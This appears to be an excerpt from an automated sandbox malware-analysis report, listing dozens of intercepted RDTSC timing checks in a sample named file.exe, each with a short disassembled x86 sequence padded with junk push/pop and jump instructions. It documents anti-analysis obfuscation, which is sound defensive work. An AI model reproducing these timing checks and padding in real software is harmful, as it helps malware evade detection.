                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1708A second address: E1709D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1709D second address: E170F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b add edx, dword ptr [ebp+122D3673h] 0x00000011 lea eax, dword ptr [ebp+1248BA24h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FE478F58EB8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov edi, 1FF34DC9h 0x00000036 nop 0x00000037 push eax 0x00000038 jl 00007FE478F58EBCh 0x0000003e jl 00007FE478F58EB6h 0x00000044 pop eax 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 jc 00007FE478F58EB6h 0x0000004f pop ecx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E170F7 second address: E17107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17107 second address: E17168 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov cx, 3863h 0x00000011 jmp 00007FE478F58EBEh 0x00000016 lea eax, dword ptr [ebp+1248B9E0h] 0x0000001c or dword ptr [ebp+122D2116h], edx 0x00000022 push esi 0x00000023 pop edi 0x00000024 nop 0x00000025 pushad 0x00000026 push ecx 0x00000027 jmp 00007FE478F58EC4h 0x0000002c pop ecx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 push edx 0x00000031 pop edx 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FE478F58EBFh 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17168 second address: E1716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1716C second address: DF7135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FE478F58EB8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D2BD0h], ecx 0x00000028 mov dl, 43h 0x0000002a call dword ptr [ebp+122D27D8h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jbe 00007FE478F58EB8h 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7135 second address: DF7178 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 jmp 00007FE478BEC550h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007FE478BEC54Ch 0x00000016 jl 00007FE478BEC546h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE478BEC558h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7178 second address: DF71B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FE478F58ECFh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3F9E second address: DD3FA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3FA4 second address: DD3FA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3FA8 second address: DD3FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3FB0 second address: DD3FBA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE478F58EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B85B second address: E4B865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE478BEC546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B865 second address: E4B86B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B86B second address: E4B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B871 second address: E4B882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FE478F58EB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B882 second address: E4B886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B886 second address: E4B89A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C070 second address: E4C076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4C076 second address: E4C07E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51F34 second address: E51F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50EA9 second address: E50EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50EAD second address: E50ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC558h 0x00000007 jne 00007FE478BEC546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE478BEC546h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50ED9 second address: E50EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E513FB second address: E51401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E51597 second address: E515B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBCh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FE478F58EB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5183F second address: E51857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FE478BEC54Eh 0x0000000b popad 0x0000000c push esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5576A second address: E55776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jo 00007FE478F58EB6h 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E55776 second address: E55796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Bh 0x00000007 jo 00007FE478BEC557h 0x0000000d jmp 00007FE478BEC54Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57C83 second address: E57C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57C98 second address: E57CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE478BEC546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FE478BEC54Bh 0x00000012 pushad 0x00000013 jc 00007FE478BEC546h 0x00000019 js 00007FE478BEC546h 0x0000001f jmp 00007FE478BEC54Fh 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E57CD3 second address: E57CD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E597B7 second address: E597BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E2E3 second address: E5E2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE478F58EBCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E2F3 second address: E5E318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE478BEC54Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E318 second address: E5E331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE478F58EBEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E331 second address: E5E337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E4A7 second address: E5E4AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E844 second address: E5E848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E848 second address: E5E87A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE478F58EBEh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E87A second address: E5E881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63B9A second address: E63B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E63E8D second address: E63EBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478BEC553h 0x0000000d jmp 00007FE478BEC556h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E64034 second address: E64053 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE478F58EC5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E64053 second address: E6406C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC54Ch 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a js 00007FE478BEC546h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6846B second address: E68487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68913 second address: E68950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC557h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FE478BEC548h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FE478BEC54Bh 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68C52 second address: E68C5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FE478F58EB6h 0x00000009 pop ebx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD24A4 second address: DD24A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD24A9 second address: DD24C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FE478F58EBFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70D81 second address: E70D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FE478BEC546h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71018 second address: E71029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE478F58EB6h 0x0000000a jc 00007FE478F58EB6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71029 second address: E71033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE478BEC546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E715AA second address: E715BA instructions: 0x00000000 rdtsc 0x00000002 js 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E715BA second address: E715BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E718DF second address: E71914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478F58EC5h 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FE478F58EC4h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71914 second address: E7193A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FE478BEC54Eh 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 jmp 00007FE478BEC54Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71BC2 second address: E71BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FE478F58EC7h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FE478F58EBCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71BED second address: E71BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E71BF1 second address: E71BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E72465 second address: E7248A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FE478BEC559h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7248A second address: E7248E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76923 second address: E76935 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE478BEC54Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76935 second address: E76941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FE478F58EB6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75B45 second address: E75B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FE478BEC546h 0x0000000d popad 0x0000000e push edi 0x0000000f jmp 00007FE478BEC54Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75B65 second address: E75BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FE478F58EC1h 0x0000000d jmp 00007FE478F58EC2h 0x00000012 jmp 00007FE478F58EBBh 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FE478F58EB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75BA5 second address: E75BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75BA9 second address: E75BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75E4E second address: E75E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jns 00007FE478BEC548h 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FE478BEC546h 0x00000013 jl 00007FE478BEC546h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75E69 second address: E75E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FE478F58EC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75E89 second address: E75EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE478BEC557h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E75EA9 second address: E75EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76092 second address: E760A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478BEC54Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76214 second address: E76261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnp 00007FE478F58EB6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007FE478F58EBDh 0x0000001b jmp 00007FE478F58EBEh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 ja 00007FE478F58EB6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76261 second address: E7626D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE478BEC546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7B2F9 second address: E7B344 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478F58EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jc 00007FE478F58EB6h 0x00000012 jmp 00007FE478F58EBCh 0x00000017 popad 0x00000018 jmp 00007FE478F58EC0h 0x0000001d jmp 00007FE478F58EBEh 0x00000022 jc 00007FE478F58EBCh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82E11 second address: E82E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82E16 second address: E82E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E810E0 second address: E810FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478BEC557h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E810FB second address: E81116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81116 second address: E8111B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8128F second address: E812A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE478F58EBFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81519 second address: E8151D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E818E0 second address: E818FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE478F58EB6h 0x00000008 jmp 00007FE478F58EBEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E818FC second address: E8190B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8190B second address: E81941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FE478F58EC1h 0x0000000f jmp 00007FE478F58EC7h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81CF2 second address: E81CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81CF8 second address: E81CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81CFC second address: E81D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478BEC54Fh 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
